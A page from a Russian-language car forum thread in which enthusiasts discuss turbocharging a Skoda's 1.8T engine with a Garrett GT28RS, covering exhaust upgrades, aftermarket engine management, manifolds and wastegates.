+ Ответить в теме
Страница 11 из 20 ПерваяПервая ... 9 10 11 12 13 ... ПоследняяПоследняя
Показано с 101 по 110 из 199

Тема: Mk4 1.8Т и Garrett GT28RS

Комбинированный просмотр

Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Машина
    Skoda
    Originally posted by Kirill_gti@Apr 10 2007, 16:49
    вот тебе график от AUQ(180лс)! по моменту 300нм
    я выбираю между полноценным К04 и гибридом К04- в мотор точно не полезу.
    следовательно гаррет на нашей степени ставить смысла нет! будешь разжимать и надувать мотор не забудь про правильные шатуны!
    <div align='right'><{POST_SNAPBACK}></div>
    График хорошо бы, где по горизонтали обороты, а по вертикали - л.с/Нм
    Это чипованный 180-ти сильный? И где момент в 300 ?
    песок сыпется....не останавливайтесь на достигнутом !

Originally posted by BON@Apr 10 2007, 17:15
    График хорошо бы, где по горизонтали обороты, а по вертикали - л.с/Нм
    Это чипованный 180-ти сильный? И где момент в 300 ?

чипованный

момент на другом графе-который дома на бумажке

Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Машина
    Skoda
    Думаю заняться выпуском.
    Есть идеи поставить 3-х дюймовый, но думаю траблы будут по геометрической проходимости, на заниженной машине такие водопроводные трубы не есть гуд.

.....меня немного убила фраза услышанная неоднократно, что такой выпуск ничего не даст, по сравнению с штатными 55 мм., сказам им, что они бредят, но подумал зачем спорить, ответ на вопрос на конкретной машине даст только стенд.

Поеду на неделе пообщаться по новым мозгам:
    http://www.lucasturbo.ru/M_prog_m.html

...... думаю это решит многие недостатки штатных мозгов, и должно передвинуть удобство и мощность в другое измерение.

Originally posted by BON@May 21 2007, 08:35
    Думаю заняться выпуском.
    Есть идеи поставить 3-х дюймовый, но думаю траблы будут по геометрической проходимости, на заниженной машине такие водопроводные трубы не есть гуд.

.....меня немного убила фраза услышанная неоднократно, что такой выпуск ничего не даст, по сравнению с штатными 55 мм., сказам им, что они бредят, но подумал зачем спорить, ответ на вопрос на конкретной машине даст только стенд.
    Поеду на неделе пообщаться по новым мозгам:
    http://www.lucasturbo.ru/M_prog_m.html

...... думаю это решит многие недостатки штатных мозгов, и должно передвинуть удобство и мощность в другое измерение.
    Нихрена себе... наконец то это появилось в массах...

З.Ы. А не дорого ли отдавать за это около 3 штук?? Тыж январь все рыкламировал :-))))

Машина
    Skoda
    Originally posted by bafomet@May 21 2007, 12:21
    Нихрена себе... наконец то это появилось в массах...

З.Ы. А не дорого ли отдавать за это около 3 штук?? Тыж январь все рыкламировал :-))))
    По предварительной инфе должно получиться подешевле.
    Склоняюсь к Халтек.

Январь озадачил, непонятным отношением к климат-контролю и вопрос о полноценной работе с ABS тоже не все гладко. И самое главное что очень мало людей кому можно доверить отстройку такого Г4. т.е получится что они будут учиться на мне.

Машина
    Skoda
    Штатные мозги должны уйти на покой..... их место займут другие.
    Очередной этап выведет машинку в другую категорию.

Машина
    Skoda
    Предварительные замеры показали, что штатный выпуск никуда не годиться, хоть он и прямоточный, но диаметром 54 мм, можно лишь порадовать слегка форсированный ВАЗик или овощной 1.8Т.
    Кривая момента горбом, и после 5000 тыщ. выпуск нещадно душит ее. Т.е. мошность после 5000 тысяч продолжает и растет дальше за пределы штатного ограничителя, а момент очень сильно падает.
    Чтоб при настройке мозга не говорили, что вот тут могло бы быть лучше, а тебя не тот выпуск, заменю его до мозга.

Предварительно записался на первые числа июля на замену выпуска в фирме СТАЛКЕР.
    труба на 2,5 дюймов начиная от толстого пайпа который шел с китом и далее глушитель с аналогичным большим входом. Глушак на выбор, но этот выбор небольшой, в наличии очень мало компактных глушителей с входом 65 мм, и то на заказ.
    По стоимости 3000-3500 труба + 500 работа + глушак (МЖ ракинг 5000-6000 тыщ. .......ино от 7000 тыщ.)

GTI-Racing Igorb will become famous soon enough Igorb will become famous soon enough Аватар для Igorb
    Машина
    golf_mk1
    заменив трехдырочный уродец на логстайл т25&#092;т3 коллекктор, ты получишь оттдачу от 28рс на 300 оборотов/мин раньше( я когдато говорил тебе)))).
    3** это не плохо, но не совсем нужно, до 250 лс.
    поменяв на 3" без нормальных мозгов, тебе сразу скажет превет доктор овербуст
    когда будешь менять выпуск, купи нормальный гейт, все равно к этому придет очередь :D :D
    back in the days where motorsport was organised by real men with hairy chests who didn`t give a hoot about health and safety

Overload http://overload.net.ua/forum/viewtop...d0f88ef70d72f2

Машина
    Skoda
    Originally posted by Igorb@Jun 14 2007, 15:48
    заменив трехдырочный уродец на логстайл т25&#092;т3 коллекктор, ты получишь оттдачу от 28рс на 300 оборотов/мин раньше( я когдато говорил тебе)))).
    <span style="color:orange">возможно, попозже</span>
    3** это не плохо, но не совсем нужно, до 250 лс.
    поменяв на 3" без нормальных мозгов, тебе сразу скажет превет доктор овербуст
    <span style="color:orange">Хочешь сказать, что после смены выпуска я не доеду до установки новых мозгов ? </span>
    когда будешь менять выпуск, купи нормальный гейт, все равно к этому придет очередь :D :D
    <span style="color:orange">что посоветуешь ?</span>

GTI-Racing Igorb will become famous soon enough Igorb will become famous soon enough Аватар для Igorb
    Машина
    golf_mk1
    с заменой коллектора, придется менять хоузинг на турбе, я бы посоветовал взять не т25 и не форддисчардж стайл а четырехдырочный дисчардж и т3 инлет.
    есть очень качественные переходники с 4 болтов на V банд 3** с минимальным рестрикшн выпуска, когда поюзаешь V-band поймешь что снять турбину за 20 минут и откручивать 2 часа две большие разницы, плюс будет компенсироваться нагрузка от вибраций выпускного тракта и деформаций кузова -и как следствие нагрузка на хоузинг,болты крепления и сам коллектор меньше.

вастгейт-тиал 38 -пока не поменяешь шатуны и поршни, его хватит за глаза.

коллектор бери логстайл с фланцем под 38 ВГ, все эти красивые снейкшейпы разгоняют тербину позже чем правильно отлитая чугунина.
    равнодлинные снекшейпы нужны только для пиковых значений-здесь они зарекомендовали себя очень хорошо.

в идеале вывести отдельную трубу на вг, но это коргда уже все в идеале))) и впервую очередь полностью реализированы мозги, тогда есть повод задуматься над бекпреше создаваемым завихрениями газов от вг .

турбы с внешним тиалом живут долго и счастливо.

почему ХАЛТЕЧ?наверное потому что им барыжат за углом)))

DTA-единственный правильный выбор.иметь у себя под капотом мозги которые юзают в DTM намного приятнее,чем драговые заливалки бензина)))))

овербуст придет только после 6 000.
    back in the days where motorsport was organised by real men with hairy chests who didn`t give a hoot about health and safety

Overload http://overload.net.ua/forum/viewtop...d0f88ef70d72f2

+ Ответить в теме
Страница 11 из 20 ПерваяПервая ... 9 10 11 12 13 ... ПоследняяПоследняя